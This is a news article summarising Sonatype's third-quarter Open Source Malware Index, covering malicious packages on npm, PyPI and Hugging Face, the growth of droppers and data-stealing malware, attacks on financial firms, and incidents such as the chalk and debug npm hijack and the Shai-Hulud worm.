Open source malware as we know it, is malicious code hidden within software packages shared publicly on platforms like npm, PyPI, and Hugging Face. These platforms host free tools developers use on the job, which makes them an easy target for criminals who want to slip harmful code into trusted systems.
Sonatype’s latest Open Source Malware Index that was released earlier today recorded 34,319 malicious open source packages in the third quarter of this year. In total, Sonatype has found 877,522 malicious packages in the last 6 years. The company said attackers are now patient and well organised, using AI to embed malware directly into the tools developers rely on.
This new generation of malware is designed to look ordinary while stealing data or keeping long-term access to systems. Instead of flooding networks with noisy attacks, criminals now focus on stealth. They use AI to make their malware blend in with trusted code. This makes it much harder for security teams to detect before the damage is done.
Why Are the Numbers So High?
Attackers have learned that open source ecosystems are an ideal place to hide. These platforms depend on community trust and open collaboration, which allows anyone to upload a package. Once a tainted file is published, it can spread quickly through thousands of projects.
In Q3, data exfiltration malware made up 37% of all the malicious open source packages detected, according to Sonatype. This type of malware focuses on stealing credentials, access tokens, and other private information. Developers often use open source libraries in company software, which gives attackers a backdoor into corporate systems.
Another reason for the increase is the evolution of multi-stage attacks. Nearly 38% of all threats in Q3 were “droppers”, lightweight files that secretly install extra payloads like backdoors or information stealers. Backdoor-laden packages alone grew 143% from the previous quarter. These multi-layer attacks make detection much harder because the first file seems harmless, but once installed, it fetches other malware in the background.
More from News
- Experts Share: Could Smart Glasses Really Replace Smartphones?
- Ofcom Issues First Fine Under The Online Safety Act
- A New Report Reveals How Many People Use The Internet
- Is Trump The President Who Cried “Tariff”? Here’s What The US’s Potential 100% Tariff On China Means For UK Businesses
- Real Or Dupe: What Products Do Gen Z Shoppers Favour?
- Is AI Making People More Likely To Lie?
- YouTube To Restore Previously Banned Accounts
- Who Won The Chats Case Between OpenAI And The New York Times?
Crypto mining tools, which were once popular among hackers, have fallen to just 4% of total malware this quarter, compared to 6% before. Criminals are moving away from simple, easy-to-detect code and investing more in long-term attacks that offer a steady stream of stolen data or financial access.
Who Is Being Targeted?
Data shows that financial organisations are under the most pressure. Sonatype’s research found that 47% of blocked open source malware attacks in Q3 targeted banks and other financial services. These criminals just want money, credentials and confidential information that can be sold or used for more attacks.
Attackers also target developers directly infecting the tools they use, criminals can reach a much larger group of victims at once. The npm hijack of the popular “chalk” and “debug” packages, which together had more than two billion weekly downloads, proved how much damage can be done when trusted software turns hostile.
Another campaign, named Shai-Hulud, spread automatically across repositories, stealing credentials and publishing new compromised packages without human help. This self-replicating behaviour is only the beginning of a new level of sophistication in malware design, where a single infection can multiply across thousands of projects in a short time.
What Happened Earlier This Year?
You’ll remember that in April, Sonatype reported 17,954 malicious packages in the first quarter of 2025, which already was a record at that time. Over half of those targeted confidential data, up from 26% in late 2024. Banks and state offices were frequent victims, as criminals searched for tokens, system logs and login details that could open entire networks.
That has since only gotten worse as latest report shows more refined malware aimed at stealing information rather than simple disruption are being used. What began as an increase in cryptominers and data stealers has now developed into highly organised attacks targeting trusted dependencies…
